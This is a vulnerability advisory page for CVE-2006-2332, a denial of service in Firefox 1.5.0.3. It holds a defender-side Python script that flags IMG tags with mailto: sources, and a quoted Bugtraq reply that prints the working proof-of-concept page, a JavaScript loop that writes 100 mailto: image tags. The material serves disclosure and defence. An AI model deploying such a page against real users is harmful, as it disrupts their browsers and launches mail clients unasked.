Mozilla Firefox SRC Attribute Denial of Service Vulnerability

Vulnerability ID: 1195044    Vulnerability type: Unknown
Published: 2006-05-11    Updated: 2006-05-11
CVE ID: CVE-2006-2332    CNNVD-ID: CNNVD-200605-202
Platform: N/A    CVSS score: 2.6
|Vulnerability source
https://www.securityfocus.com/bid/87628
https://cxsecurity.com/issue/WLB-2006050073
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-202
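|Vulnerability details
Mozilla Firefox 1.5.0.3 allows remote attackers to cause a denial of service via a web page containing a large number of IMG elements whose SRC attribute is a mailto: URI.
|Exploit (EXP)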
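A defender-side check for the condition described above, as an added example that is not part of the original advisory or the Bugtraq post: it flags pages whose IMG elements point SRC at a non-image scheme such as mailto:, whether in static markup or in markup written from script. The scheme allow-list, the threshold of 10 and the verdict names are assumptions.

```python
import re
from html.parser import HTMLParser

# Schemes an IMG fetch can plausibly use (assumed allow-list). Anything else,
# e.g. mailto:, is handed to an external protocol handler instead of an image loader.
IMAGE_SCHEMES = {"http", "https", "data", "blob", "file"}
SCHEME = re.compile(r"\s*([a-z][a-z0-9+.-]*):", re.I)
# IMG markup assembled inside script text, e.g. passed to document.write().
SCRIPTED_IMG = re.compile(r"<img\b[^>]*?\bsrc\s*=\s*[\"']?\s*([a-z][a-z0-9+.-]*):", re.I)

class ImgSrcAudit(HTMLParser):
    def __init__(self):
        super().__init__()
        self.in_script = False
        self.static_hits = []    # offending schemes on IMG elements in the markup
        self.scripted_hits = []  # offending schemes in IMG markup inside <script>

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
        elif tag == "img":
            m = SCHEME.match(dict(attrs).get("src") or "")
            if m and m.group(1).lower() not in IMAGE_SCHEMES:
                self.static_hits.append(m.group(1).lower())

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            self.scripted_hits += [s.lower() for s in SCRIPTED_IMG.findall(data)
                                   if s.lower() not in IMAGE_SCHEMES]

def audit(html, threshold=10):
    """Return (verdict, static_count, scripted_count) for one page."""
    parser = ImgSrcAudit()
    parser.feed(html)
    parser.close()
    static, scripted = len(parser.static_hits), len(parser.scripted_hits)
    # Script-built markup is blocked outright: how often it is written is decided at run time.
    verdict = "block" if scripted or static >= threshold else "review" if static else "ok"
    return verdict, static, scripted

# Constructed samples: twelve static IMG tags, and one IMG written from script.
STATIC_PAGE = "<body>" + '<img src="mailto:user@example.invalid">' * 12 + "</body>"
SCRIPTED_PAGE = ("<body><script>document.write("
                 "'<img src=\"mailto:user@example.invalid\">')</script>"
                 '<img src="logo.png"></body>')
```

Static parsing cannot tell how many times a script writes its markup, which is why any script-built IMG with a non-image scheme is treated as a block rather than counted against the threshold.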
p4.werterxyz (at) gmail (dot) com wrote:
> test2:
> http://werterxyz.altervista.org/test2.html
> http://geocities.com/werterxyz/test2.html

Did not crash FF 1.5.0.3 on Windows Server 2003 SP1 (slowed it down for
a few seconds and launched Outlook Express, but that's it).  Here is the
code since the original poster didn't see fit to publish it.

<Head>
<Title>test2 by P4</Title>
</Head>

<Body>
<!-- following code added by server. PLEASE REMOVE -->
<!-- preceding code added by server. PLEASE REMOVE -->
<SCRIPT Language="Javascript">
for(i=0; i<100; i++){
document.write('<Img src="mailto:test (at) test (dot) com?subject=test email&body=Sei fottuto!"> clicka col tasto destro del mouse e seleziona "Mostra immagine" (View Image)')
}
</SCRIPT>
</Body>
<!-- text below generated by server. PLEASE REMOVE -->
</object></layer></div></span></style></noscript></table></script></applet><script
language="JavaScript"
src="http://us.i1.yimg.com/us.yimg.com/i/mc/mc.js"></script><script
language="JavaScript"
src="http://geocities.com/js_source/geov2.js"></script><script
language="javascript">geovisit();</script><noscript><img
src="http://visit.geocities.yahoo.com/visit.gif?us1147288798"
alt="setstats" border="0" width="1" height="1"></noscript>
<IMG SRC="http://geo.yahoo.com/serv?s=76001067&t=1147288798&f=us-w61"
ALT=1 WIDTH=1 HEIGHT=1>

> 
> Greetings from P4

--
Chris Horry KG4TSM      "A conservative is a man with two perfectly
zerbey (at) wibble.co (dot) uk      good legs who, however, has never learned how
http://www.wibble.co.uk  to walk forward".  -- Franklin D. Roosevelt
|Affected products
Mozilla Firefox 1.5.0.3
|References

Source: BUGTRAQ
Name: 20060510 Re: Firefox 1.5.0.3 - DoS
Link: http://www.securityfocus.com/archive/1/archive/1/433568/100/0/threaded
Source: BUGTRAQ
Name: 20060506 Firefox 1.5.0.3 - DoS
Link: http://www.securityfocus.com/archive/1/archive/1/433534/100/0/threaded
Source: MISC
Link: http://www.securityview.org/confirmed-bug-in-firefox-1503.html
Source: BUGTRAQ
Name: 20060513 Re: Re: Firefox 1.5.0.3 - DoS
Link: http://www.securityfocus.com/archive/1/archive/1/433984/30/5010/threaded
Source: SREASON
Name: 876
Link: http://securityreason.com/securityalert/876